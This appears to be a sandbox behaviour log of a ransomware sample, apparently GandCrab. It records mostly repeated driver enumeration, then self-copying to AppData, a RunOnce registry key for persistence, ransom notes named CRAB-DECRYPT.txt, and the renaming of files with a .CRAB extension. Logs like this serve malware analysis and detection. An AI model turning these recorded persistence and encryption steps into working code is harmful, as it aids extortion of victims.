Driver Get Name load_address = 3858694144 True 1
Fn
Driver Get Name load_address = 3859152896 True 1
Fn
Driver Get Name load_address = 3859349504 True 1
Fn
Driver Get Name load_address = 3860004864 True 1
Fn
Driver Get Name load_address = 3860922368 True 1
Fn
Driver Get Name load_address = 3861053440 True 1
Fn
Driver Get Name load_address = 3861250048 True 1
Fn
Driver Get Name load_address = 3861315584 True 1
Fn
Driver Get Name load_address = 3861970944 True 1
Fn
Driver Get Name load_address = 3862560768 True 1
Fn
Driver Get Name load_address = 3862626304 True 1
Fn
Driver Get Name load_address = 3862757376 True 1
Fn
Driver Get Name load_address = 3862822912 True 1
Fn
Driver Get Name load_address = 3862953984 True 1
Fn
Driver Get Name load_address = 3863019520 True 1
Fn
Driver Get Name load_address = 3863412736 True 1
Fn
Driver Get Name load_address = 3863478272 True 1
Fn
Driver Get Name load_address = 3863609344 True 1
Fn
Driver Get Name load_address = 3863740416 True 1
Fn
Driver Get Name load_address = 3863937024 True 1
Fn
Driver Get Name load_address = 3864461312 True 1
Fn
Driver Get Name load_address = 3864592384 True 1
Fn
Driver Get Name load_address = 3864985600 True 1
Fn
Driver Get Name load_address = 3865116672 True 1
Fn
Driver Get Name load_address = 3865313280 True 1
Fn
Driver Get Name load_address = 3865837568 True 1
Fn
Driver Get Name load_address = 3865968640 True 1
Fn
Driver Get Name load_address = 3866099712 True 1
Fn
Driver Get Name load_address = 3866361856 True 1
Fn
Driver Get Name load_address = 3866689536 True 1
Fn
Driver Get Name load_address = 3868917760 True 1
Fn
Driver Get Name load_address = 3868983296 True 1
Fn
Driver Get Name load_address = 3870228480 True 1
Fn
Driver Get Name load_address = 3870752768 True 1
Fn
Driver Get Name load_address = 3890085888 True 1
Fn
Driver Get Name load_address = 3892576256 True 1
Fn
Driver Get Name load_address = 3893035008 True 1
Fn
Driver Get Name load_address = 3893231616 True 1
Fn
Driver Get Name load_address = 3893886976 True 1
Fn
Driver Get Name load_address = 3873439744 True 1
Fn
Driver Get Name load_address = 3873767424 True 1
Fn
Driver Get Name load_address = 3874029568 True 1
Fn
Driver Get Name load_address = 3874160640 True 1
Fn
Driver Get Name load_address = 3874684928 True 1
Fn
Driver Get Name load_address = 3875864576 True 1
Fn
Driver Get Name load_address = 3875995648 True 1
Fn
Driver Get Name load_address = 3876061184 True 1
Fn
Driver Get Name load_address = 3876126720 True 1
Fn
Driver Get Name load_address = 3876192256 True 1
Fn
Driver Get Name load_address = 3876323328 True 1
Fn
Driver Get Name load_address = 3876454400 True 1
Fn
Driver Get Name load_address = 3878486016 True 1
Fn
Driver Get Name load_address = 3878617088 True 1
Fn
Driver Get Name load_address = 3878748160 True 1
Fn
Driver Get Name load_address = 3878813696 True 1
Fn
Driver Get Name load_address = 3879010304 True 1
Fn
Driver Get Name load_address = 3879075840 True 1
Fn
Driver Get Name load_address = 3879403520 True 1
Fn
Driver Get Name load_address = 3880058880 True 1
Fn
Driver Get Name load_address = 3880189952 True 1
Fn
Driver Get Name load_address = 3880386560 True 1
Fn
Driver Get Name load_address = 3880517632 True 1
Fn
Driver Get Name load_address = 3881041920 True 1
Fn
Driver Get Name load_address = 3881631744 True 1
Fn
Driver Get Name load_address = 3881697280 True 1
Fn
Driver Get Name load_address = 3881762816 True 1
Fn
Driver Get Name load_address = 3881828352 True 1
Fn
Driver Get Name load_address = 3881893888 True 1
Fn
Driver Get Name load_address = 3882221568 True 1
Fn
Driver Get Name load_address = 3882483712 True 1
Fn
Driver Get Name load_address = 3882614784 True 1
Fn
Driver Get Name load_address = 3882680320 True 1
Fn
Driver Get Name load_address = 3882811392 True 1
Fn
Driver Get Name load_address = 3882942464 True 1
Fn
Driver Get Name load_address = 3883335680 True 1
Fn
Driver Get Name load_address = 3883532288 True 1
Fn
Driver Get Name load_address = 3883991040 True 1
Fn
Driver Get Name load_address = 3884122112 True 1
Fn
Driver Get Name load_address = 3885694976 True 1
Fn
Driver Get Name load_address = 3885760512 True 1
Fn
Driver Get Name load_address = 3885826048 True 1
Fn
Driver Get Name load_address = 3885891584 True 1
Fn
Driver Get Name load_address = 3886415872 True 1
Fn
Driver Get Name load_address = 3886481408 True 1
Fn
Driver Get Name load_address = 3886940160 True 1
Fn
Driver Get Name load_address = 3887005696 True 1
Fn
Driver Get Name load_address = 3887136768 True 1
Fn
Driver Get Name load_address = 3887333376 True 1
Fn
Driver Get Name load_address = 3887464448 True 1
Fn
Driver Get Name load_address = 3887529984 True 1
Fn
Driver Get Name load_address = 3887661056 True 1
Fn
Driver Get Name load_address = 3887726592 True 1
Fn
Driver Get Name load_address = 3887792128 True 1
Fn
Driver Get Name load_address = 3887988736 True 1
Fn
Driver Get Name load_address = 3888250880 True 1
Fn
Driver Get Name load_address = 3888578560 True 1
Fn
Driver Get Name load_address = 309460992 True 1
Fn
Driver Get Name load_address = 301989888 True 1
Fn
Driver Get Name load_address = 305725440 True 1
Fn
Driver Get Name load_address = 3888709632 True 1
Fn
Driver Get Name load_address = 3888775168 True 1
Fn
Driver Get Name load_address = 307167232 True 1
Fn
Driver Get Name load_address = 307232768 True 1
Fn
Driver Get Name load_address = 3889299456 True 1
Fn
Driver Get Name load_address = 3889496064 True 1
Fn
Driver Get Name load_address = 3889627136 True 1
Fn
Driver Get Name load_address = 3889758208 True 1
Fn
Driver Get Name load_address = 3889889280 True 1
Fn
Driver Get Name load_address = 3874816000 True 1
Fn
Driver Get Name load_address = 3882090496 True 1
Fn
Driver Get Name load_address = 3885170688 True 1
Fn
Driver Get Name load_address = 3870949376 True 1
Fn
Driver Get Name load_address = 3885367296 True 1
Fn
Driver Get Name load_address = 3894280192 True 1
Fn
Driver Get Name load_address = 3871408128 True 1
Fn
Driver Get Name load_address = 3871735808 True 1
Fn
Driver Get Name load_address = 3872456704 True 1
Fn
Driver Get Name load_address = 3906994176 True 1
Fn
Driver Get Name load_address = 3907321856 True 1
Fn
Driver Get Name load_address = 3907518464 True 1
Fn
Driver Get Name load_address = 3908304896 True 1
Fn
Driver Get Name load_address = 3908894720 True 1
Fn
Driver Get Name load_address = 3896508416 True 1
Fn
Driver Get Name load_address = 3896901632 True 1
Fn
Driver Get Name load_address = 3897032704 True 1
Fn
Driver Get Name load_address = 3897753600 True 1
Fn
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 14942208 True 1
Fn
Driver Get Name load_address = 3250606080 True 1
Fn
Driver Get Name load_address = 3259330560 True 1
Fn
Driver Get Name load_address = 3235078144 True 1
Fn
Driver Get Name load_address = 3872587776 True 1
Fn
Driver Get Name load_address = 3873177600 True 1
Fn
Driver Get Name load_address = 3856662528 True 1
Fn
Driver Get Name load_address = 3857121280 True 1
Fn
Driver Get Name load_address = 3857317888 True 1
Fn
Driver Get Name load_address = 3857448960 True 1
Fn
Driver Get Name load_address = 3857514496 True 1
Fn
Driver Get Name load_address = 3857580032 True 1
Fn
Driver Get Name load_address = 3857645568 True 1
Fn
Driver Get Name load_address = 3858300928 True 1
Fn
Driver Get Name load_address = 3858694144 True 1
Fn
Driver Get Name load_address = 3859152896 True 1
Fn
Driver Get Name load_address = 3859349504 True 1
Fn
Driver Get Name load_address = 3860004864 True 1
Fn
Driver Get Name load_address = 3860922368 True 1
Fn
Driver Get Name load_address = 3861053440 True 1
Fn
Driver Get Name load_address = 3861250048 True 1
Fn
Driver Get Name load_address = 3861315584 True 1
Fn
Driver Get Name load_address = 3861970944 True 1
Fn
Driver Get Name load_address = 3862560768 True 1
Fn
Driver Get Name load_address = 3862626304 True 1
Fn
Driver Get Name load_address = 3862757376 True 1
Fn
Driver Get Name load_address = 3862822912 True 1
Fn
Driver Get Name load_address = 3862953984 True 1
Fn
Driver Get Name load_address = 3863019520 True 1
Fn
Driver Get Name load_address = 3863412736 True 1
Fn
Driver Get Name load_address = 3863478272 True 1
Fn
Driver Get Name load_address = 3863609344 True 1
Fn
Driver Get Name load_address = 3863740416 True 1
Fn
Driver Get Name load_address = 3863937024 True 1
Fn
Driver Get Name load_address = 3864461312 True 1
Fn
Driver Get Name load_address = 3864592384 True 1
Fn
Driver Get Name load_address = 3864985600 True 1
Fn
Driver Get Name load_address = 3865116672 True 1
Fn
Driver Get Name load_address = 3865313280 True 1
Fn
Driver Get Name load_address = 3865837568 True 1
Fn
Driver Get Name load_address = 3865968640 True 1
Fn
Driver Get Name load_address = 3866099712 True 1
Fn
Driver Get Name load_address = 3866361856 True 1
Fn
Driver Get Name load_address = 3866689536 True 1
Fn
Driver Get Name load_address = 3868917760 True 1
Fn
Driver Get Name load_address = 3868983296 True 1
Fn
Driver Get Name load_address = 3870228480 True 1
Fn
Driver Get Name load_address = 3870752768 True 1
Fn
Driver Get Name load_address = 3890085888 True 1
Fn
Driver Get Name load_address = 3892576256 True 1
Fn
Driver Get Name load_address = 3893035008 True 1
Fn
Driver Get Name load_address = 3893231616 True 1
Fn
Driver Get Name load_address = 3893886976 True 1
Fn
Driver Get Name load_address = 3873439744 True 1
Fn
Driver Get Name load_address = 3873767424 True 1
Fn
Driver Get Name load_address = 3874029568 True 1
Fn
Driver Get Name load_address = 3874160640 True 1
Fn
Driver Get Name load_address = 3874684928 True 1
Fn
Driver Get Name load_address = 3875864576 True 1
Fn
Driver Get Name load_address = 3875995648 True 1
Fn
Driver Get Name load_address = 3876061184 True 1
Fn
Driver Get Name load_address = 3876126720 True 1
Fn
Driver Get Name load_address = 3876192256 True 1
Fn
Driver Get Name load_address = 3876323328 True 1
Fn
Driver Get Name load_address = 3876454400 True 1
Fn
Driver Get Name load_address = 3878486016 True 1
Fn
Driver Get Name load_address = 3878617088 True 1
Fn
Driver Get Name load_address = 3878748160 True 1
Fn
Driver Get Name load_address = 3878813696 True 1
Fn
Driver Get Name load_address = 3879010304 True 1
Fn
Driver Get Name load_address = 3879075840 True 1
Fn
Driver Get Name load_address = 3879403520 True 1
Fn
Driver Get Name load_address = 3880058880 True 1
Fn
Driver Get Name load_address = 3880189952 True 1
Fn
Driver Get Name load_address = 3880386560 True 1
Fn
Driver Get Name load_address = 3880517632 True 1
Fn
Driver Get Name load_address = 3881041920 True 1
Fn
Driver Get Name load_address = 3881631744 True 1
Fn
Driver Get Name load_address = 3881697280 True 1
Fn
Driver Get Name load_address = 3881762816 True 1
Fn
Driver Get Name load_address = 3881828352 True 1
Fn
Driver Get Name load_address = 3881893888 True 1
Fn
Driver Get Name load_address = 3882221568 True 1
Fn
Driver Get Name load_address = 3882483712 True 1
Fn
Driver Get Name load_address = 3882614784 True 1
Fn
Driver Get Name load_address = 3882680320 True 1
Fn
Driver Get Name load_address = 3882811392 True 1
Fn
Driver Get Name load_address = 3882942464 True 1
Fn
Driver Get Name load_address = 3883335680 True 1
Fn
Driver Get Name load_address = 3883532288 True 1
Fn
Driver Get Name load_address = 3883991040 True 1
Fn
Driver Get Name load_address = 3884122112 True 1
Fn
Driver Get Name load_address = 3885694976 True 1
Fn
Driver Get Name load_address = 3885760512 True 1
Fn
Driver Get Name load_address = 3885826048 True 1
Fn
Driver Get Name load_address = 3885891584 True 1
Fn
Driver Get Name load_address = 3886415872 True 1
Fn
Driver Get Name load_address = 3886481408 True 1
Fn
Driver Get Name load_address = 3886940160 True 1
Fn
Driver Get Name load_address = 3887005696 True 1
Fn
Driver Get Name load_address = 3887136768 True 1
Fn
Driver Get Name load_address = 3887333376 True 1
Fn
Driver Get Name load_address = 3887464448 True 1
Fn
Driver Get Name load_address = 3887529984 True 1
Fn
Driver Get Name load_address = 3887661056 True 1
Fn
Driver Get Name load_address = 3887726592 True 1
Fn
Driver Get Name load_address = 3887792128 True 1
Fn
Driver Get Name load_address = 3887988736 True 1
Fn
Driver Get Name load_address = 3888250880 True 1
Fn
Driver Get Name load_address = 3888578560 True 1
Fn
Driver Get Name load_address = 309460992 True 1
Fn
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 14942208 True 1
Fn
Driver Enumerate load_addresses = 1703576 True 1
Fn
Driver Enumerate load_addresses = 14942208 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 14942208 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 14942208 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 14942208 True 1
Fn
Module Get Filename process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\CIiHmnxMn6Ps\AppData\Roaming True 1
Fn
File Create filename = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, type = size True 1
Fn
Driver Enumerate load_addresses = 1703528 True 1
Fn
Driver Enumerate load_addresses = 15007744 True 1
Fn
Driver Get Name load_address = 3250606080 True 1
Fn
Driver Get Name load_address = 3259330560 True 1
Fn
Driver Get Name load_address = 3235078144 True 1
Fn
Driver Get Name load_address = 3872587776 True 1
Fn
Driver Get Name load_address = 3873177600 True 1
Fn
Driver Get Name load_address = 3856662528 True 1
Fn
Driver Get Name load_address = 3857121280 True 1
Fn
Driver Get Name load_address = 3857317888 True 1
Fn
Driver Get Name load_address = 3857448960 True 1
Fn
Driver Get Name load_address = 3857514496 True 1
Fn
Driver Get Name load_address = 3857580032 True 1
Fn
Driver Get Name load_address = 3857645568 True 1
Fn
Driver Get Name load_address = 3858300928 True 1
Fn
Driver Get Name load_address = 3858694144 True 1
Fn
Driver Get Name load_address = 3859152896 True 1
Fn
Driver Get Name load_address = 3859349504 True 1
Fn
Driver Get Name load_address = 3860004864 True 1
Fn
Driver Get Name load_address = 3860922368 True 1
Fn
Driver Get Name load_address = 3861053440 True 1
Fn
Driver Get Name load_address = 3861250048 True 1
Fn
Driver Get Name load_address = 3861315584 True 1
Fn
Driver Get Name load_address = 3861970944 True 1
Fn
Driver Get Name load_address = 3862560768 True 1
Fn
Driver Get Name load_address = 3862626304 True 1
Fn
Driver Get Name load_address = 3862757376 True 1
Fn
Driver Get Name load_address = 3862822912 True 1
Fn
Driver Get Name load_address = 3862953984 True 1
Fn
Driver Get Name load_address = 3863019520 True 1
Fn
Driver Get Name load_address = 3863412736 True 1
Fn
Driver Get Name load_address = 3863478272 True 1
Fn
Driver Get Name load_address = 3863609344 True 1
Fn
Driver Get Name load_address = 3863740416 True 1
Fn
Driver Get Name load_address = 3863937024 True 1
Fn
Driver Get Name load_address = 3864461312 True 1
Fn
Driver Get Name load_address = 3864592384 True 1
Fn
Driver Get Name load_address = 3864985600 True 1
Fn
Driver Get Name load_address = 3865116672 True 1
Fn
Driver Get Name load_address = 3865313280 True 1
Fn
Driver Get Name load_address = 3865837568 True 1
Fn
Driver Get Name load_address = 3865968640 True 1
Fn
Driver Get Name load_address = 3866099712 True 1
Fn
Driver Get Name load_address = 3866361856 True 1
Fn
Driver Get Name load_address = 3866689536 True 1
Fn
Driver Get Name load_address = 3868917760 True 1
Fn
Driver Get Name load_address = 3868983296 True 1
Fn
Driver Get Name load_address = 3870228480 True 1
Fn
Driver Get Name load_address = 3870752768 True 1
Fn
Driver Get Name load_address = 3890085888 True 1
Fn
Driver Get Name load_address = 3892576256 True 1
Fn
Driver Get Name load_address = 3893035008 True 1
Fn
Driver Get Name load_address = 3893231616 True 1
Fn
Driver Get Name load_address = 3893886976 True 1
Fn
Driver Get Name load_address = 3873439744 True 1
Fn
Driver Get Name load_address = 3873767424 True 1
Fn
Driver Get Name load_address = 3874029568 True 1
Fn
Driver Get Name load_address = 3874160640 True 1
Fn
Driver Get Name load_address = 3874684928 True 1
Fn
Driver Get Name load_address = 3875864576 True 1
Fn
Driver Get Name load_address = 3875995648 True 1
Fn
Driver Get Name load_address = 3876061184 True 1
Fn
Driver Get Name load_address = 3876126720 True 1
Fn
Driver Get Name load_address = 3876192256 True 1
Fn
Driver Get Name load_address = 3876323328 True 1
Fn
Driver Get Name load_address = 3876454400 True 1
Fn
Driver Get Name load_address = 3878486016 True 1
Fn
Driver Get Name load_address = 3878617088 True 1
Fn
Driver Get Name load_address = 3878748160 True 1
Fn
Driver Get Name load_address = 3878813696 True 1
Fn
Driver Get Name load_address = 3879010304 True 1
Fn
Driver Get Name load_address = 3879075840 True 1
Fn
Driver Get Name load_address = 3879403520 True 1
Fn
Driver Get Name load_address = 3880058880 True 1
Fn
Driver Get Name load_address = 3880189952 True 1
Fn
Driver Get Name load_address = 3880386560 True 1
Fn
Driver Get Name load_address = 3880517632 True 1
Fn
Driver Get Name load_address = 3881041920 True 1
Fn
Driver Get Name load_address = 3881631744 True 1
Fn
Driver Get Name load_address = 3881697280 True 1
Fn
Driver Get Name load_address = 3881762816 True 1
Fn
Driver Get Name load_address = 3881828352 True 1
Fn
Driver Get Name load_address = 3881893888 True 1
Fn
Driver Get Name load_address = 3882221568 True 1
Fn
Driver Get Name load_address = 3882483712 True 1
Fn
Driver Get Name load_address = 3882614784 True 1
Fn
Driver Get Name load_address = 3882680320 True 1
Fn
Driver Get Name load_address = 3882811392 True 1
Fn
Driver Get Name load_address = 3882942464 True 1
Fn
Driver Get Name load_address = 3883335680 True 1
Fn
Driver Get Name load_address = 3883532288 True 1
Fn
Driver Get Name load_address = 3883991040 True 1
Fn
Driver Get Name load_address = 3884122112 True 1
Fn
Driver Get Name load_address = 3885694976 True 1
Fn
Driver Get Name load_address = 3885760512 True 1
Fn
Driver Get Name load_address = 3885826048 True 1
Fn
Driver Get Name load_address = 3885891584 True 1
Fn
Driver Get Name load_address = 3886415872 True 1
Fn
Driver Get Name load_address = 3886481408 True 1
Fn
Driver Get Name load_address = 3886940160 True 1
Fn
Driver Get Name load_address = 3887005696 True 1
Fn
Driver Get Name load_address = 3887136768 True 1
Fn
Driver Get Name load_address = 3887333376 True 1
Fn
Driver Get Name load_address = 3887464448 True 1
Fn
Driver Get Name load_address = 3887529984 True 1
Fn
Driver Get Name load_address = 3887661056 True 1
Fn
Driver Get Name load_address = 3887726592 True 1
Fn
Driver Get Name load_address = 3887792128 True 1
Fn
Driver Get Name load_address = 3887988736 True 1
Fn
Driver Get Name load_address = 3888250880 True 1
Fn
Driver Get Name load_address = 3888578560 True 1
Fn
Driver Get Name load_address = 309460992 True 1
Fn
Driver Get Name load_address = 301989888 True 1
Fn
Driver Get Name load_address = 305725440 True 1
Fn
Driver Get Name load_address = 3888709632 True 1
Fn
Driver Get Name load_address = 3888775168 True 1
Fn
Driver Get Name load_address = 307167232 True 1
Fn
Driver Get Name load_address = 307232768 True 1
Fn
Driver Get Name load_address = 3889299456 True 1
Fn
Driver Get Name load_address = 3889496064 True 1
Fn
Driver Get Name load_address = 3889627136 True 1
Fn
Driver Get Name load_address = 3889758208 True 1
Fn
Driver Get Name load_address = 3889889280 True 1
Fn
Driver Get Name load_address = 3874816000 True 1
Fn
Driver Get Name load_address = 3882090496 True 1
Fn
Driver Get Name load_address = 3885170688 True 1
Fn
Driver Get Name load_address = 3870949376 True 1
Fn
Driver Get Name load_address = 3885367296 True 1
Fn
Driver Get Name load_address = 3894280192 True 1
Fn
Driver Get Name load_address = 3871408128 True 1
Fn
Driver Get Name load_address = 3871735808 True 1
Fn
Driver Get Name load_address = 3872456704 True 1
Fn
Driver Get Name load_address = 3906994176 True 1
Fn
Driver Get Name load_address = 3907321856 True 1
Fn
Driver Get Name load_address = 3907518464 True 1
Fn
Driver Get Name load_address = 3908304896 True 1
Fn
Driver Get Name load_address = 3908894720 True 1
Fn
Driver Get Name load_address = 3896508416 True 1
Fn
Driver Get Name load_address = 3896901632 True 1
Fn
Driver Get Name load_address = 3897032704 True 1
Fn
Driver Get Name load_address = 3897753600 True 1
Fn
Driver Enumerate load_addresses = 1703540 True 1
Fn
Driver Enumerate load_addresses = 15007744 True 1
Fn
Driver Get Name load_address = 3250606080 True 1
Fn
Driver Get Name load_address = 3259330560 True 1
Fn
Driver Get Name load_address = 3235078144 True 1
Fn
Driver Get Name load_address = 3872587776 True 1
Fn
Driver Get Name load_address = 3873177600 True 1
Fn
Driver Get Name load_address = 3856662528 True 1
Fn
Driver Get Name load_address = 3857121280 True 1
Fn
Driver Get Name load_address = 3857317888 True 1
Fn
Driver Get Name load_address = 3857448960 True 1
Fn
Driver Get Name load_address = 3857514496 True 1
Fn
Driver Get Name load_address = 3857580032 True 1
Fn
Driver Get Name load_address = 3857645568 True 1
Fn
Driver Get Name load_address = 3858300928 True 1
Fn
Driver Get Name load_address = 3858694144 True 1
Fn
Driver Get Name load_address = 3859152896 True 1
Fn
Driver Get Name load_address = 3859349504 True 1
Fn
Driver Get Name load_address = 3860004864 True 1
Fn
Driver Get Name load_address = 3860922368 True 1
Fn
Driver Get Name load_address = 3861053440 True 1
Fn
Driver Get Name load_address = 3861250048 True 1
Fn
Driver Get Name load_address = 3861315584 True 1
Fn
Driver Get Name load_address = 3861970944 True 1
Fn
Driver Get Name load_address = 3862560768 True 1
Fn
Driver Get Name load_address = 3862626304 True 1
Fn
Driver Get Name load_address = 3862757376 True 1
Fn
Driver Get Name load_address = 3862822912 True 1
Fn
Driver Get Name load_address = 3862953984 True 1
Fn
Driver Get Name load_address = 3863019520 True 1
Fn
Driver Get Name load_address = 3863412736 True 1
Fn
Driver Get Name load_address = 3863478272 True 1
Fn
Driver Get Name load_address = 3863609344 True 1
Fn
Driver Get Name load_address = 3863740416 True 1
Fn
Driver Get Name load_address = 3863937024 True 1
Fn
Driver Get Name load_address = 3864461312 True 1
Fn
Driver Get Name load_address = 3864592384 True 1
Fn
Driver Get Name load_address = 3864985600 True 1
Fn
Driver Get Name load_address = 3865116672 True 1
Fn
Driver Get Name load_address = 3865313280 True 1
Fn
Driver Get Name load_address = 3865837568 True 1
Fn
Driver Get Name load_address = 3865968640 True 1
Fn
Driver Get Name load_address = 3866099712 True 1
Fn
Driver Get Name load_address = 3866361856 True 1
Fn
Driver Get Name load_address = 3866689536 True 1
Fn
Driver Get Name load_address = 3868917760 True 1
Fn
Driver Get Name load_address = 3868983296 True 1
Fn
Driver Get Name load_address = 3870228480 True 1
Fn
Driver Get Name load_address = 3870752768 True 1
Fn
Driver Get Name load_address = 3890085888 True 1
Fn
Driver Get Name load_address = 3892576256 True 1
Fn
Driver Get Name load_address = 3893035008 True 1
Fn
Driver Get Name load_address = 3893231616 True 1
Fn
Driver Get Name load_address = 3893886976 True 1
Fn
Driver Get Name load_address = 3873439744 True 1
Fn
Driver Get Name load_address = 3873767424 True 1
Fn
Driver Get Name load_address = 3874029568 True 1
Fn
Driver Get Name load_address = 3874160640 True 1
Fn
Driver Get Name load_address = 3874684928 True 1
Fn
Driver Get Name load_address = 3875864576 True 1
Fn
Driver Get Name load_address = 3875995648 True 1
Fn
Driver Get Name load_address = 3876061184 True 1
Fn
Driver Get Name load_address = 3876126720 True 1
Fn
Driver Get Name load_address = 3876192256 True 1
Fn
Driver Get Name load_address = 3876323328 True 1
Fn
Driver Get Name load_address = 3876454400 True 1
Fn
Driver Get Name load_address = 3878486016 True 1
Fn
Driver Get Name load_address = 3878617088 True 1
Fn
Driver Get Name load_address = 3878748160 True 1
Fn
Driver Get Name load_address = 3878813696 True 1
Fn
Driver Get Name load_address = 3879010304 True 1
Fn
Driver Get Name load_address = 3879075840 True 1
Fn
Driver Get Name load_address = 3879403520 True 1
Fn
Driver Get Name load_address = 3880058880 True 1
Fn
Driver Get Name load_address = 3880189952 True 1
Fn
Driver Get Name load_address = 3880386560 True 1
Fn
Driver Get Name load_address = 3880517632 True 1
Fn
Driver Get Name load_address = 3881041920 True 1
Fn
Driver Get Name load_address = 3881631744 True 1
Fn
Driver Get Name load_address = 3881697280 True 1
Fn
Driver Get Name load_address = 3881762816 True 1
Fn
Driver Get Name load_address = 3881828352 True 1
Fn
Driver Get Name load_address = 3881893888 True 1
Fn
Driver Get Name load_address = 3882221568 True 1
Fn
Driver Get Name load_address = 3882483712 True 1
Fn
Driver Get Name load_address = 3882614784 True 1
Fn
Driver Get Name load_address = 3882680320 True 1
Fn
Driver Get Name load_address = 3882811392 True 1
Fn
Driver Get Name load_address = 3882942464 True 1
Fn
Driver Get Name load_address = 3883335680 True 1
Fn
Driver Get Name load_address = 3883532288 True 1
Fn
Driver Get Name load_address = 3883991040 True 1
Fn
Driver Get Name load_address = 3884122112 True 1
Fn
Driver Get Name load_address = 3885694976 True 1
Fn
Driver Get Name load_address = 3885760512 True 1
Fn
Driver Get Name load_address = 3885826048 True 1
Fn
Driver Get Name load_address = 3885891584 True 1
Fn
Driver Get Name load_address = 3886415872 True 1
Fn
Driver Get Name load_address = 3886481408 True 1
Fn
Driver Get Name load_address = 3886940160 True 1
Fn
Driver Get Name load_address = 3887005696 True 1
Fn
Driver Get Name load_address = 3887136768 True 1
Fn
Driver Get Name load_address = 3887333376 True 1
Fn
Driver Get Name load_address = 3887464448 True 1
Fn
Driver Get Name load_address = 3887529984 True 1
Fn
Driver Get Name load_address = 3887661056 True 1
Fn
Driver Get Name load_address = 3887726592 True 1
Fn
Driver Get Name load_address = 3887792128 True 1
Fn
Driver Get Name load_address = 3887988736 True 1
Fn
Driver Get Name load_address = 3888250880 True 1
Fn
Driver Get Name load_address = 3888578560 True 1
Fn
Driver Get Name load_address = 309460992 True 1
Fn
Driver Enumerate load_addresses = 1703528 True 1
Fn
Driver Enumerate load_addresses = 15007744 True 1
Fn
Driver Enumerate load_addresses = 1703540 True 1
Fn
Driver Enumerate load_addresses = 15007744 True 1
Fn
Module Create Mapping module_name = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, filename = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, protection = PAGE_WRITECOPY, maximum_size = 0 True 1
Fn
Module Map C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, desired_access = FILE_MAP_COPY True 1
Fn
Driver Enumerate load_addresses = 1703528 True 1
Fn
Driver Enumerate load_addresses = 15269888 True 1
Fn
Driver Enumerate load_addresses = 1703540 True 1
Fn
Driver Enumerate load_addresses = 15269888 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\nuatrx.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\nuatrx.exe, size = 237065 True 1
Fn
Data
Module Unmap process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x779af8d0 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = rxrjsnunjtt, data = "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\nuatrx.exe", size = 120, type = REG_SZ True 1
Fn
Thread 0x350
7015 0
»
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\bootmgr, type = file_attributes True 1
Fn
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
